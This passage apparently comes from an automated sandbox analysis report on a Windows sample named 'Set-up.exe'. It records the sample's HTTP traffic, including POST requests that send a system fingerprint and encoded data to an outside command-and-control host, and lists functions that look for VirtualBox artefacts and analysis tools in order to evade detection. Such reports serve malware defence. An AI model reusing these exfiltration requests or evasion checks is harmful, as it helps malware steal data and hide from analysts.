Dec 29, 2024 16:51:03.011533022 CET	12360	OUT	POST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1 Host: home.eleventh11pt.top Accept: / Content-Type: application/json Content-Length: 499220 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 33 31 36 30 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317316068", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 29, 2024 16:51:03.132874012 CET	1236	OUT	Data Raw: 4c 6f 4b 43 5a 4c 57 52 69 36 37 57 61 4e 70 6f 64 6b 7a 30 72 58 5c 2f 41 49 4a 5a 4c 63 34 7a 38 64 5c 2f 4c 4a 37 66 38 4b 77 33 66 2b 39 44 58 50 4f 50 65 76 34 50 78 48 37 54 50 36 45 57 45 72 31 4d 4e 69 66 47 71 64 43 76 54 64 70 30 36 6e Data Ascii: LoKCZLWRi67WaNpodkz0rX\/AIJZLc4z8d\/LJ7f8Kw3f+9DXPOPev4PxH7TP6EWEr1MNifGqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/dxxdNbNNJxd00mj8h6K\/Zm2\/4JKC4\/5uB2f90p3f+9JX\/OPWvyi+JHhA\/D34h+PfALagNWPgfxp4p8IHVRamxGpnw1r
Dec 29, 2024 16:51:03.132889032 CET	3708	OUT	Data Raw: 32 49 71 55 5a 59 6e 43 53 79 5c 2f 47 5a 66 6d 47 4d 5c 2f 6a 33 36 58 48 30 43 73 5c 2f 77 44 6f 34 5a 48 6c 50 69 66 34 66 63 5a 34 33 78 74 38 42 73 32 78 65 46 79 48 47 65 49 6b 75 43 6c 77 4a 78 46 77 4e 78 70 69 4b 56 57 72 53 34 52 38 54 Data Ascii: 2IqUZYnCSy\/GZfmGM\/j36XH0Cs\/wDo4ZHlPif4fcZ43xt8Bs2xeFyHGeIkuClwJxFwNxpiKVWrS4R8TuBcLxZx7h+EcVnFGhiMbwdnWE4wz\/hvjDBYfHUctzeGfZNxBkOUaFFWKg2P7fl\/9lX9VH8BCUUUUAFQv\/rI6+hf2V\/h54a+LX7RXwe+GfjGG7m8L+OfG+k+GtbSwu3sb4WOqu9tJLZXaBjBd25dZ7Z3jmh86N
Dec 29, 2024 16:51:03.132901907 CET	4944	OUT	Data Raw: 77 44 58 77 44 31 70 5c 2f 77 44 73 54 66 4a 35 6e 2b 74 5c 2f 64 66 76 78 31 5c 2f 7a 6e 5c 2f 77 43 76 6b 41 70 74 75 6b 6c 64 5c 2f 77 44 70 72 35 70 39 65 76 38 41 6e 2b 66 72 54 50 6e 2b 54 66 38 41 4a 36 65 5a 46 64 66 35 34 37 66 72 55 30 Data Ascii: wDXwD1p\/wDsTfJ5n+t\/dfvx1\/zn\/wCvkAptukld\/wDpr5p9ev8An+frTPn+Tf8AJ6eZFdf547frU0cXmeSjp+56+ZJEfP8A8\/h7euXyfx\/35JfK3yf8tu3+QKC4b\/L9UQs23f8APv8ANit\/N8vIz\/pX4\/XtTJP3f8e8\/wCt\/d\/uPen7SrIn7v8Ady\/9\/v8ARf8AP1NQ7nkX5P3XAi8sfv8A\/wDgv89aDUY
Dec 29, 2024 16:51:03.133064985 CET	4944	OUT	Data Raw: 39 4f 5c 2f 46 56 4d 77 38 54 66 44 5c 2f 4d 36 38 61 61 78 57 5a 2b 44 50 43 57 59 59 79 64 4f 6e 47 6e 47 72 69 73 54 6e 6e 46 73 71 6c 54 6c 6a 35 63 73 49 33 62 63 61 63 49 51 54 35 59 52 53 6a 6f 71 54 79 5c 2f 66 39 50 38 41 36 39 52 31 5c Data Ascii: 9O\/FVMw8TfD\/M68aaxWZ+DPCWYYydOnGnGrisTnnFsqlTlj5csI3bcacIQT5YRSjoqTy\/f9P8A69R1\/Wh\/FHtPL8f+AR+X7\/p\/9eo6sUUGhXqOTt+NXKr0AV6KsU2Tn5+mP6f1Heg6CGiiigCLYfb\/AD+FMqxVetPZ+f4f8E6AqOTt+P8ASpKay7qPZ+f4f8ECGm7F9P5\/406ij2fn+H\/BNKfX5fqM2D3\/AM\/hV
Dec 29, 2024 16:51:03.133137941 CET	4944	OUT	Data Raw: 50 68 71 4d 4d 58 57 63 4b 46 47 6e 43 4e 6b 6f 78 58 79 72 2b 30 56 71 48 6b 2b 46 39 47 30 35 53 51 31 5c 2f 72 51 6e 59 63 66 4e 44 59 32 64 77 48 55 35 35 78 35 31 33 62 76 77 4d 35 51 63 67 5a 42 2b 4f 74 75 33 6a 47 4f 5c 2f 72 58 30 58 2b Data Ascii: PhqMMXWcKFGnCNkoxXyr+0VqHk+F9G05SQ1\/rQnYcfNDY2dwHU55x513bvwM5QcgZB+Otu3jGO\/rX0X+0Zq1nc+IdB0a2v7K8fTNOu7mcWd1FdLDLqF0kJjkaFnEcwXTkZopNkqq0bMoV0J+dK\/wBL\/o84KjhfCfhzEUpQn\/as8yzSc6bUozWIzHE0qElJN818JQwzvutuh\/jr9KvMa+N8cOLsLWjUp\/2LDJ8mhTqKUZ
Dec 29, 2024 16:51:03.133199930 CET	2472	OUT	Data Raw: 6b 5c 2f 76 62 34 5c 2f 33 6b 6f 38 32 54 5c 2f 4f 4b 64 6e 47 39 66 2b 65 58 5c 2f 77 42 61 6d 59 5c 2f 64 75 2b 37 65 5c 2f 6d 5c 2f 70 5c 2f 4c 5c 2f 48 36 31 71 61 38 36 38 5c 2f 36 2b 59 77 38 72 76 53 61 4e 50 2b 57 50 6c 5c 2f 34 66 31 5c Data Ascii: k\/vb4\/3ko82T\/OKdnG9f+eX\/wBamY\/du+7e\/m\/p\/L\/H61qa868\/6+Yw8rvSaNP+WPl\/4f1\/pTG3+Z\/feP8A55\/5\/HvU2Mb8P\/27+Vnyf5e\/+TTJPLXZ\/rPM7xx8dP8AP\/16Cyt3KFN6Y\/1n+f8APfoTULR\/P5Ozznk\/7b+\/H+frVxtmz78aJ\/qpJP8A21x16ev0qH5xG6b43eTuIrX0\/wAf8+n
Dec 29, 2024 16:51:03.253561974 CET	2472	OUT	Data Raw: 38 58 65 4a 5c 2f 44 4d 69 79 36 44 72 6d 70 61 59 55 6b 45 6f 69 74 72 6c 78 62 4e 49 43 43 48 6b 74 48 4c 32 73 72 67 67 45 4e 4a 43 78 42 35 47 44 58 6e 59 38 53 65 48 69 47 59 61 39 6f 70 43 46 67 35 47 71 57 4f 45 4b 38 73 47 50 6e 34 55 71 Data Ascii: 8XeJ\/DMiy6DrmpaYUkEoitrlxbNICCHktHL2srggENJCxB5GDXnY8SeHiGYa9opCFg5GqWOEK8sGPn4UqOWBxjvT4vEGhTq7wa1pEyR\/6x4tSs5FTjPzskxC8An5iOOele\/mGGyTOcJVy7NcPlea4HERtWwOYUsJjsJXj1VXDYmNWjVjZ7ThJa+Z4mV4ziLIMbRzXJMVnWS5jhZKWHzLK62Oy7G4ebas6OMwkqNejJvls4VI
Dec 29, 2024 16:51:03.253746986 CET	2472	OUT	Data Raw: 38 52 44 43 31 2b 42 73 39 56 65 57 57 5a 68 6d 38 36 64 4b 68 54 78 44 77 32 43 79 6e 44 30 73 56 6d 6e 31 35 34 65 72 56 6a 6c 2b 4d 79 37 44 31 38 4e 57 78 75 57 59 35 34 66 4d 73 4e 44 46 59 4e 31 73 4a 44 36 33 68 76 61 76 6f 72 48 62 57 6f Data Ascii: 8RDC1+Bs9VeWWZhm86dKhTxDw2CynD0sVmn154erVjl+My7D18NWxuWY54fMsNDFYN1sJD63hvavorHbWoYfFQ8Hy3el3eqt8PPhb8TFbR9Qub+3j8O\/F74feFviX4ViuGutO02SLU4vDni\/SV1WCKK4s7fUPtENlf6hapDez7FfWZRnGWZ9gKOaZPjaOYZfiHUVHFYduVKo6VSVGqk2ou8KsJwkmk1KLTPhc9yDOeGcxqZRn
Dec 29, 2024 16:51:03.253856897 CET	7416	OUT	Data Raw: 2f 71 74 44 48 34 69 6a 69 4d 62 6a 38 76 70 5a 72 67 38 4a 39 61 70 59 53 65 46 70 59 6e 45 5a 5a 58 70 34 2b 6e 52 72 56 71 64 52 34 53 54 72 75 4b 70 77 6e 4b 50 2b 62 57 49 38 46 66 46 48 4c 38 48 6d 75 4f 7a 44 68 48 48 59 48 44 35 4e 68 4d Data Ascii: /qtDH4ijiMbj8vpZrg8J9apYSeFpYnEZZXp4+nRrVqdR4STruKpwnKP+bWI8FfFHL8HmuOzDhHHYHD5NhMdj8xWMxWW4XEYfA5ZjsVluPxkcFXx0MZiMNhswweJwdSvhqFan9YoypRk5OKfN1E\/X8P6mpabewtZ6l8NrW41bwrDo3xN+Hfj\/4paf40n1jUYvB\/hXwl8I5PFH\/C4J\/Hmof2C2o6Hf8AwssvCWoap4u07T9I
Dec 29, 2024 16:51:03.253905058 CET	4944	OUT	Data Raw: 76 5a 65 48 62 71 7a 73 76 46 31 68 2b 7a 6d 74 78 34 6e 30 33 34 6b 61 52 34 67 54 54 76 44 65 75 32 63 41 74 50 46 32 6c 66 45 4f 44 54 72 5a 50 76 71 34 30 50 52 4c 75 52 5a 72 72 52 39 4b 75 5a 6c 78 74 6c 75 4e 50 74 4a 70 46 78 6a 47 31 35 Data Ascii: vZeHbqzsvF1h+zmtx4n034kaR4gTTvDeu2cAtPF2lfEODTrZPvq40PRLuRZrrR9KuZlxtluNPtJpFxjG15IWYYwMYPGB6VEfDnh4uJDoOimRRhXOl2JcDngN5GQOTwD3Pqa4uKfoa5VxLxNnfEkeN87y2rnucY3NcVQwlKjG317hvE8LToKsuWrOGHy\/GYjEYFVpVoYLMpTxWGhSp4rMMPjO7gr9oHnnCHBPDHBb8OuHs3w3C+
Dec 29, 2024 16:51:09.486716986 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 29 Dec 2024 15:51:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	193.233.84.212	80	6880	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 16:51:09.906896114 CET	101	OUT	GET /nJdxBxrKAaFnbbAEfLtg1735465836?argument=0 HTTP/1.1 Host: home.eleventh11pt.top Accept: /
Dec 29, 2024 16:51:11.498604059 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sun, 29 Dec 2024 15:51:11 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	193.233.84.212	80	6880	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 16:51:11.771110058 CET	174	OUT	POST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1 Host: home.eleventh11pt.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 29, 2024 16:51:13.545677900 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sun, 29 Dec 2024 15:51:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	52.73.63.247	443	6880	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 15:51:01 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-29 15:51:01 UTC	224	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 15:51:01 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-29 15:51:01 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	10:50:57
Start date:	29/12/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x20000
File size:	7'363'720 bytes
MD5 hash:	FB412D366ACB254B7870E17EA228E971
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.8%
Total number of Nodes:	1187
Total number of Limit Nodes:	69

Executed Functions

Function 0005A550 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 777networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 0003D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,000301B1), ref: 0003D8E2

setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0005A670
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A6A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A6AB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A6AF

Part of subcall function 0003D090: GetLastError.KERNEL32 ref: 0003D0A1
Part of subcall function 0003D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0A9
Part of subcall function 0003D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0CD
Part of subcall function 0003D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0D7
Part of subcall function 0003D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0003D381
Part of subcall function 0003D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0003D3A2
Part of subcall function 0003D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D3BF
Part of subcall function 0003D090: GetLastError.KERNEL32 ref: 0003D3C9
Part of subcall function 0003D090: SetLastError.KERNEL32(00000000), ref: 0003D3D4

Part of subcall function 00064F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00064F9E

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0005A831
WSAGetLastError.WS2_32 ref: 0005A854
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0005A97A
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0005A9A6
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0005AB0F
htons.WS2_32(?), ref: 0005AC01
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0005AC38
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0005AC64
WSAGetLastError.WS2_32 ref: 0005ACDC
WSAGetLastError.WS2_32 ref: 0005ADF5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0005AE9D
htons.WS2_32(?), ref: 0005AEDB
bind.WS2_32(?,00000002,00000010), ref: 0005AEF5
WSAGetLastError.WS2_32 ref: 0005AFB9
htons.WS2_32(?), ref: 0005AFFC
bind.WS2_32(?,?,?), ref: 0005B014
WSAGetLastError.WS2_32 ref: 0005B056
htons.WS2_32(?), ref: 0005B0D2
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0005B0EA

Strings

Local Interface %s is ip %s using address family %i, xrefs: 0005AE60
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0005AD0A
Name '%s' family %i resolved to '%s' family %i, xrefs: 0005ADAC
Bind to local port %d failed, trying next, xrefs: 0005AFE5
Could not set TCP_NODELAY: %s, xrefs: 0005A871
@, xrefs: 0005AC42
Trying %s:%d..., xrefs: 0005A7C2, 0005A7DE
Couldn't bind to '%s' with errno %d: %s, xrefs: 0005AE1F
Local port: %hu, xrefs: 0005AF28
Trying [%s]:%d..., xrefs: 0005A689
cf-socket.c, xrefs: 0005A5CD, 0005A735
bind failed with errno %d: %s, xrefs: 0005B080
@, xrefs: 0005A8F4
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0005A6CE
cf_socket_open() -> %d, fd=%d, xrefs: 0005A796

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 2815861332-2373386790
Opcode ID: 4af9e76397fb7b77198466083f8ee1ccc61eeed97fce41456edc610d1dc2f5f7
Instruction ID: faf7cfa551559b860ac4139e15a353e72e2024d1396d59298d7002fdc90a6b94
Opcode Fuzzy Hash: 4af9e76397fb7b77198466083f8ee1ccc61eeed97fce41456edc610d1dc2f5f7
Instruction Fuzzy Hash: 3E6206716083409BE7218F14CC45BABB7F9BF86315F044629FD8997292E771E849CB93

Function 000229FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00022A27
RegOpenKeyExA.KERNELBASE ref: 00022A8A
CharUpperA.USER32 ref: 00022AEF
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022B05
CreateToolhelp32Snapshot.KERNEL32 ref: 00022B6D
Process32First.KERNEL32 ref: 00022B88
Process32Next.KERNEL32 ref: 00022BC0
QueryFullProcessImageNameA.KERNELBASE ref: 00022C26
CloseHandle.KERNELBASE ref: 00022C49
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022C5F
CreateToolhelp32Snapshot.KERNEL32 ref: 00022CC4
Process32First.KERNEL32 ref: 00022CDF
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00022D0D
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022D42
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022D5C
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022D76
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022D90
Process32Next.KERNEL32 ref: 00022DBF
CloseHandle.KERNELBASE ref: 00022DFC
EnumWindows.USER32 ref: 00022E21

Strings

public_check, xrefs: 00022B26
C:\USERS\PUBLIC\, xrefs: 00022AF4
dbg, xrefs: 00022C80
wireshark.exe, xrefs: 00022D31
yadro, xrefs: 00022EFB
x64dbg.exe, xrefs: 00022D65
C:\Windows\System32\VBox*.dll, xrefs: 00022A1B
dbg_third, xrefs: 00022E48
dbg_sec, xrefs: 00022DDE
WINDBG.EXE, xrefs: 00022C4E
0, xrefs: 00022DA9
ida.exe, xrefs: 00022D7F
procmon.exe, xrefs: 00022D4B
SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 00022A76
vbox_first, xrefs: 00022A49
vbox_second, xrefs: 00022AAB

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
API String ID: 515599682-3783588604
Opcode ID: e2227a072d71184c8088c52f2673ad0fb2099f9145ddcef954241ca859890dff
Instruction ID: 9d482918ccd6704ab61116c41d72b09297fb4c276226b0b3758e065d60b59adf
Opcode Fuzzy Hash: e2227a072d71184c8088c52f2673ad0fb2099f9145ddcef954241ca859890dff
Instruction Fuzzy Hash: 9AE1D5B49053199FCB50EFA8D9856AEBBF4EF84304F50886DE588DB350EB749984CF42

Function 0002255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00022579

Part of subcall function 004F5BB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00022589), ref: 004F5BC5

GlobalMemoryStatusEx.KERNELBASE ref: 000225CC
GetLogicalDriveStringsA.KERNEL32 ref: 00022619
GetDriveTypeA.KERNELBASE ref: 00022647
GetDiskFreeSpaceExA.KERNELBASE ref: 0002267E
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00022749
KiUserCallbackDispatcher.NTDLL ref: 000227E2
SHGetKnownFolderPath.SHELL32 ref: 0002286D
wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000228BE
wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000228D4
FindFirstFileW.KERNELBASE ref: 000228F8
FindNextFileW.KERNELBASE ref: 0002291F
K32EnumProcesses.KERNEL32 ref: 0002296F

Strings

`, xrefs: 000229BC
all, xrefs: 000226E0
processes, xrefs: 00022996
uptime_minutes, xrefs: 000229E4
resolution_x, xrefs: 0002280D
resolution_y, xrefs: 0002282F
drivers, xrefs: 00022769
Num_processor, xrefs: 0002258D
Num_displays, xrefs: 000227C3
free, xrefs: 0002271E
recent_files, xrefs: 00022941
name, xrefs: 000226A2
@, xrefs: 000225B4
Num_ram, xrefs: 000225F0

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
